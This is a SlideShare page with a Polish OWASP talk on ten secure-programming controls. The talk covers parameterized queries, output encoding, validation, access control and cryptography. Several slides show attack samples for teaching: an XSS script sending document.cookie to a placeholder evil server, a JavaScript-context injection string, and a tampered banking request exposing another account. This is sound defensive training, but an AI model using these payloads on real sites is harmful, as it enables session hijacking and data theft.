Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
10 przykazań bezpiecznego
programowania
OWASP Top Ten Proactive Controls
Wojciech Dworakowski, SecuRing
OWASP Poland Chapt...
Wojtek Dworakowski
@wojdwo
CEO (od 2003)
Testowanie i doradztwo w zakresie
bezpieczeństwa aplikacji i systemów IT
OWASP Po...
OWASP
O = Open
• Materiały i narzędzia
– za darmo
– licencje Creative Commons
– open source
• Tworzone na zasadach otwarte...
OWASP Poland Chapter
• Od 2007
• Spotkania: Kraków, Poznań, Warszawa
• Wstęp wolny
• Wspierają nas:
Ankieta na 4Developers 2014*
* Badanie SecuRing „Praktyki wytwarzania bezpiecznego oprogramowania w
polskich firmach – 201...
OWASP Top10 Risk vs
OWASP Top10 Proactive Controls
Disclaimer
• Nie można opierać bezpieczeństwa aplikacji
tylko na podstawie Top 10
– To materiał edukacyjny
– Każda aplikac...
1: Parameterize Queries
SQL/LDAP/XML/cmd/…-injection
Łatwe do wykorzystania
• proste w użyciu narzędzia automatyzujące atak
Znaczne skutki ataku
Ź...
Dobre praktyki
#1 Zapytania parametryzowane
– Prepared Statements / Parametrized Queries
#2 Stored Procedures
– Uwaga na w...
Narzędzia i materiały
• Bobby Tables: A guide to preventing SQL
injection
• Query Parameterization Cheat Sheet
• SQL Injec...
2: Encode Data
XSS
• Zmiana treści strony
• Przechwycenie sesji
<script>document.body.innerHTML(“Jim was here”);</script>
<script>
var im...
Skutki braku kodowania znaków
specjalnych
• Session hijacking
• Network scanning
• Obejście zabezpieczeń przed CSRF
• Zmia...
Historia pewnej aplikacji
Cross Site Scripting
Ale często wklejenie bezpośrednio w kontekst
javascript:
<script> var split='<bean:write name="transf...
Dobre praktyki
• Kodowanie znaków specjalnych odpowiednie
do kontekstu użycia
– element HTML
– Atrybut HTML
– JavaScript
–...
Narzędzia i materiały
• XSS (Cross Site Scripting) Prevention Cheat
Sheet
• Java Encoder Project
• Microsoft .NET AntiXSS ...
3: Validate All Inputs
Po co walidacja?
• Większość innych podatności (np. injection,
xss, …) wynika (również) z braku walidacji
• Walidacja jest...
Dobre praktyki
• Walidacja wg whitelisty a nie blacklisty,
• Typowanie pól
– najlepiej „systemowo” a nie per formularz.
– ...
Narzędzia i materiały
• Input Validation Cheat Sheet
• Apache Commons Validator
• OWASP JSON Sanitizer Project
• OWASP Jav...
4: Implement Appropriate
Access Controls
Historia rachunku
Żądanie HTTP po przechwyceniu
GET /services/history/account/85101022350445200448009906 HTTP/1.1
SA-DeviceId: 940109f08ba56...
Dobre praktyki
• Decyzja po stronie serwera !
• Default deny
• Wszystkie żądania muszą przejść przez
kontrolę uprawnień
– ...
if (currentUser.hasRole(“administrator”)) {
//pozwol
} else {
//zabron
}
If (currentUser.isPermitted(printPermission)) {
/...
Narzędzia i materiały
• Access Control Cheat Sheet
• Java Authorization Guide with Apache Shiro
– Apache Shiro Authorizati...
5: Establish Identity and
Authentication Controls
Przykład defektu
• Uwierzytelnienie kluczem lokalnie trzymanym
na komputerze
• Proces logowania:
1. podajemy login
2. wybi...
Dobre praktyki
• Sprawdź prawa dostępu do funkcji
pozwalających na zmianę danych
uwierzytelniających
• Zasada „łańcucha za...
Narzędzia i materiały
• Authentication Cheat Sheet
• Password Storage Cheat Sheet
• Forgot Password Cheat Sheet
• Session ...
6: Protect Data and Privacy
at transit
at rest
Przykład defektu (at transit)
• SSL zapewnia szyfrowanie i autentyczność
• Co weryfikuje autentyczność serwera?
– Aplikacj...
Dobre praktyki (in transit)
• TLS
• Dla całości aplikacji
• Cookies: flaga „Secure”
• HTTP Strict Transport Security
• Zes...
Narzędzia i materiały (in transit)
• Transport Layer Protection Cheat Sheet
• Pinning Cheat Sheet
• OWASP O-Saft (SSL Audi...
Przykład defektu (at rest)
• Przechowywanie haseł
• „Własna” implementacja SHA1
public static String encrypt(byte [] in)
{...
Dobre praktyki (at rest)
• Nie próbuj wynaleźć koła !
– Własne szfry są ZŁE
– Własna implementacja crypto jest ZŁA
– Spraw...
Narzędzia i materiały
• Google KeyCzar
• Cryptographic Storage Cheat Sheet
• Password Storage Cheat Sheet
7: Implement Logging, Error
Handling and Intrusion
Detection
Narzędzia i materiały
• Logging Cheat Sheet
• OWASP AppSensor Project
8: Leverage Security Features of
Frameworks and Security
Libraries
Narzędzia i materiały
• PHP Security Cheat Sheet
• .NET Security Cheat Sheet
• Spring Security
• Apache Shiro
• OWASP Depe...
9: Include Security-Specific
Requirements
Definiowanie wymagań
• Scenariusze ataku
– Jak zagrożenia mogą osiągnąć cele?
– Wymaga doświadczenia i wiedzy eksperckiej
...
Narzędzia i materiały
• OWASP Application Security Verification
Standard Project
• Software Assurance Maturity Model
• Bus...
10: Design and Architect
Security In
Narzędzia i materiały
• Software Assurance Maturity Model
(OpenSAMM)
• Application Security Verification Standard
Project
...
Podsumowanie
To tylko Top Ten !
• Każda aplikacja jest inna
– Trzeba zdefiniować profil ryzyka (KTO?, PO CO?)
– i uwzględnić „zgodność ...
Spotkania OWASP
https://www.owasp.org/index.php/Poland
Lista mailingowa
Facebook: OWASP Poland Local Chapter
Twitter: @owa...
Dziękuję
Wojciech Dworakowski
@wojdwo
wojciech.dworakowski@securing.pl
http://www.securing.pl
10 przykazań bezpiecznego programowania
10 przykazań bezpiecznego programowania
Upcoming SlideShare
Loading in …5
×
Upcoming SlideShare
Testowanie bezpieczeństwa – jak dostosować zakres do realnych zagrożeń i budżetu
Next
Download to read offline and view in fullscreen.

3

Share

10 przykazań bezpiecznego programowania

Download to read offline

Wykład z konferencji 4Developers 2015.
OWASP - Open Web Applications Security Project to fundacja non-profit której celem jest eliminacja problemów bezpieczeństwa aplikacji.
W trakcie wykładu przedstawie krótko OWASP Top 10 w wydaniu dla programistów, czyli "Top 10 Proactive Controls" a więc najważniejsze zalecenia pozwalające na uniknięcie kluczowych błędów bezpieczeństwa.

Related Books

Free with a 30 day trial from Scribd

See all

Related Audiobooks

Free with a 30 day trial from Scribd

See all

10 przykazań bezpiecznego programowania

 1. 1. 10 przykazań bezpiecznego programowania OWASP Top Ten Proactive Controls Wojciech Dworakowski, SecuRing OWASP Poland Chapter Leader
 2. 2. Wojtek Dworakowski @wojdwo CEO (od 2003) Testowanie i doradztwo w zakresie bezpieczeństwa aplikacji i systemów IT OWASP Poland Chapter Leader (od 2011)
 3. 3. OWASP O = Open • Materiały i narzędzia – za darmo – licencje Creative Commons – open source • Tworzone na zasadach otwartej współpracy – każdy może przyłączyć się 3
 4. 4. OWASP Poland Chapter • Od 2007 • Spotkania: Kraków, Poznań, Warszawa • Wstęp wolny • Wspierają nas:
 5. 5. Ankieta na 4Developers 2014* * Badanie SecuRing „Praktyki wytwarzania bezpiecznego oprogramowania w polskich firmach – 2014” • 62% firm nie edukuje programistów w zakresie bezpieczeństwa aplikacji • >50% firm nie uwzględnia bezpieczeństwa na etapie projektowania • 73% pytanych potwierdziło, że wprowadzało poprawki wynikające z testów bezpieczeństwa • Tylko 42% potwierdziło że przed wdrożeniem wykonują testy bezpieczeństwa
 6. 6. OWASP Top10 Risk vs OWASP Top10 Proactive Controls
 7. 7. Disclaimer • Nie można opierać bezpieczeństwa aplikacji tylko na podstawie Top 10 – To materiał edukacyjny – Każda aplikacja ma swój specyficzny profil ryzyka
 8. 8. 1: Parameterize Queries
 9. 9. SQL/LDAP/XML/cmd/…-injection Łatwe do wykorzystania • proste w użyciu narzędzia automatyzujące atak Znaczne skutki ataku Źródło: http://xkcd.com/327/
 10. 10. Dobre praktyki #1 Zapytania parametryzowane – Prepared Statements / Parametrized Queries #2 Stored Procedures – Uwaga na wyjątki! (eval, blok dynamiczny, etc.) #3 Escaping – ryzykowne! String newName = request.getParameter("newName"); String id = request.getParameter("id"); PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id);
 11. 11. Narzędzia i materiały • Bobby Tables: A guide to preventing SQL injection • Query Parameterization Cheat Sheet • SQL Injection Prevention Cheat Sheet • OWASP Secure Coding Practices Quick Reference Guide
 12. 12. 2: Encode Data
 13. 13. XSS • Zmiana treści strony • Przechwycenie sesji <script>document.body.innerHTML(“Jim was here”);</script> <script> var img = new Image(); img.src="http://<some evil server>.com?” + document.cookie; </script>
 14. 14. Skutki braku kodowania znaków specjalnych • Session hijacking • Network scanning • Obejście zabezpieczeń przed CSRF • Zmiana zawartości strony (w przeglądarce) • … • Przejęcie kontroli nad przeglądarką – vide BeEF
 15. 15. Historia pewnej aplikacji
 16. 16. Cross Site Scripting Ale często wklejenie bezpośrednio w kontekst javascript: <script> var split='<bean:write name="transferFormId" property="trn_recipient">'; splitRecipient(split); </script> trn_recipient=';alert('xss');-- <script> var split='';alert('xss');--
 17. 17. Dobre praktyki • Kodowanie znaków specjalnych odpowiednie do kontekstu użycia – element HTML – Atrybut HTML – JavaScript – JSON – CSS / style – URL
 18. 18. Narzędzia i materiały • XSS (Cross Site Scripting) Prevention Cheat Sheet • Java Encoder Project • Microsoft .NET AntiXSS Library • OWASP ESAPI • Encoder Comparison Reference Project
 19. 19. 3: Validate All Inputs
 20. 20. Po co walidacja? • Większość innych podatności (np. injection, xss, …) wynika (również) z braku walidacji • Walidacja jest jak firewall – Nie zabezpiecza przed wszystkim – …ale dobrze ją mieć
 21. 21. Dobre praktyki • Walidacja wg whitelisty a nie blacklisty, • Typowanie pól – najlepiej „systemowo” a nie per formularz. – Porządkuje to bezpieczeństwo w wielu warstwach – np. potem łatwo można użyć do reguł WAF • Walidacja pierwszą linią obrony – np. silne rzutowanie typów zapobiegnie injection, – ale nie może być jedyną !
 22. 22. Narzędzia i materiały • Input Validation Cheat Sheet • Apache Commons Validator • OWASP JSON Sanitizer Project • OWASP Java HTML Sanitizer Project • Google Caja
 23. 23. 4: Implement Appropriate Access Controls
 24. 24. Historia rachunku
 25. 25. Żądanie HTTP po przechwyceniu GET /services/history/account/85101022350445200448009906 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: acc Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) GET /services/history/account/45101022350445200448005388 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: acc Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) Podmiana nr rachunku – uzyskujemy cudze dane
 26. 26. Dobre praktyki • Decyzja po stronie serwera ! • Default deny • Wszystkie żądania muszą przejść przez kontrolę uprawnień – scentralizowany, spójny mechanizm • Zasady kontroli dostępu (policy) osobne od kodu – a nie jako część kodu
 27. 27. if (currentUser.hasRole(“administrator”)) { //pozwol } else { //zabron } If (currentUser.isPermitted(printPermission)) { //pozwol } else { //zabron }
 28. 28. Narzędzia i materiały • Access Control Cheat Sheet • Java Authorization Guide with Apache Shiro – Apache Shiro Authorization features • OWASP PHPRBAC Project
 29. 29. 5: Establish Identity and Authentication Controls
 30. 30. Przykład defektu • Uwierzytelnienie kluczem lokalnie trzymanym na komputerze • Proces logowania: 1. podajemy login 2. wybieramy plik z kluczem, wprowadzamy hasło do klucza 3. jesteśmy zalogowani https://...../GenerateNewKey
 31. 31. Dobre praktyki • Sprawdź prawa dostępu do funkcji pozwalających na zmianę danych uwierzytelniających • Zasada „łańcucha zaufania” • Uwaga na sesyjność „na granicy” ! • Nie limituj długości i znaków które można użyć w haśle
 32. 32. Narzędzia i materiały • Authentication Cheat Sheet • Password Storage Cheat Sheet • Forgot Password Cheat Sheet • Session Management Cheat Sheet
 33. 33. 6: Protect Data and Privacy at transit at rest
 34. 34. Przykład defektu (at transit) • SSL zapewnia szyfrowanie i autentyczność • Co weryfikuje autentyczność serwera? – Aplikacje przeglądarkowe: Przeglądarka – Aplikacje mobilne / thick-client / embedded…: Aplikacja • Najczęstsze błędy – Brak sprawdzenia certyfikatu lub „łańcucha zaufania” – Brak obsługi wyjątku
 35. 35. Dobre praktyki (in transit) • TLS • Dla całości aplikacji • Cookies: flaga „Secure” • HTTP Strict Transport Security • Zestawy silnych szyfrów • Chain of trust • Certificate pinning
 36. 36. Narzędzia i materiały (in transit) • Transport Layer Protection Cheat Sheet • Pinning Cheat Sheet • OWASP O-Saft (SSL Audit for Testers)
 37. 37. Przykład defektu (at rest) • Przechowywanie haseł • „Własna” implementacja SHA1 public static String encrypt(byte [] in) { String out = ""; for(int i = 0; i < in.length; i++) { byte b = (byte)(in[i] ^ key[i%key.length]); out += "" + hexDigit[(b & 0xf0)>>4] + hexDigit[b & 0x0f]; } return out; }
 38. 38. Dobre praktyki (at rest) • Nie próbuj wynaleźć koła ! – Własne szfry są ZŁE – Własna implementacja crypto jest ZŁA – Sprawdzone biblioteki • Silne szyfry w silnych trybach – ECB jest ZŁE – CBC – uwaga na „padding oracle” • Dobre źródło losowości dla IV
 39. 39. Narzędzia i materiały • Google KeyCzar • Cryptographic Storage Cheat Sheet • Password Storage Cheat Sheet
 40. 40. 7: Implement Logging, Error Handling and Intrusion Detection
 41. 41. Narzędzia i materiały • Logging Cheat Sheet • OWASP AppSensor Project
 42. 42. 8: Leverage Security Features of Frameworks and Security Libraries
 43. 43. Narzędzia i materiały • PHP Security Cheat Sheet • .NET Security Cheat Sheet • Spring Security • Apache Shiro • OWASP Dependency Check / Track
 44. 44. 9: Include Security-Specific Requirements
 45. 45. Definiowanie wymagań • Scenariusze ataku – Jak zagrożenia mogą osiągnąć cele? – Wymaga doświadczenia i wiedzy eksperckiej • Dobranie zabezpieczeń == WYMAGANIA Zagrożenia Skutki Scenariusze ataku Kto? Jak? Co?
 46. 46. Narzędzia i materiały • OWASP Application Security Verification Standard Project • Software Assurance Maturity Model • Business Logic Security Cheat Sheet • Testing for business logic (OWASP-BL-001)
 47. 47. 10: Design and Architect Security In
 48. 48. Narzędzia i materiały • Software Assurance Maturity Model (OpenSAMM) • Application Security Verification Standard Project • Application Security Architecture Cheat Sheet • Attack Surface Analysis Cheat Sheet • Threat Modeling Cheat Sheet
 49. 49. Podsumowanie
 50. 50. To tylko Top Ten ! • Każda aplikacja jest inna – Trzeba zdefiniować profil ryzyka (KTO?, PO CO?) – i uwzględnić „zgodność z przepisami” • Kilka prostych kroków daje duże efekty • Warto edukować programistów w zakresie bezpieczeństwa
 51. 51. Spotkania OWASP https://www.owasp.org/index.php/Poland Lista mailingowa Facebook: OWASP Poland Local Chapter Twitter: @owasppoland
 52. 52. Dziękuję Wojciech Dworakowski @wojdwo wojciech.dworakowski@securing.pl http://www.securing.pl
 • PiotrSzczsny

  May. 14, 2015
 • dzahanam

  Apr. 24, 2015
 • katarzynabugajska14

  Apr. 23, 2015

Wykład z konferencji 4Developers 2015. OWASP - Open Web Applications Security Project to fundacja non-profit której celem jest eliminacja problemów bezpieczeństwa aplikacji. W trakcie wykładu przedstawie krótko OWASP Top 10 w wydaniu dla programistów, czyli "Top 10 Proactive Controls" a więc najważniejsze zalecenia pozwalające na uniknięcie kluczowych błędów bezpieczeństwa.

Views

Total views

1,888

On Slideshare

0

From embeds

0

Number of embeds

268

Actions

Downloads

15

Shares

0

Comments

0

Likes

3

×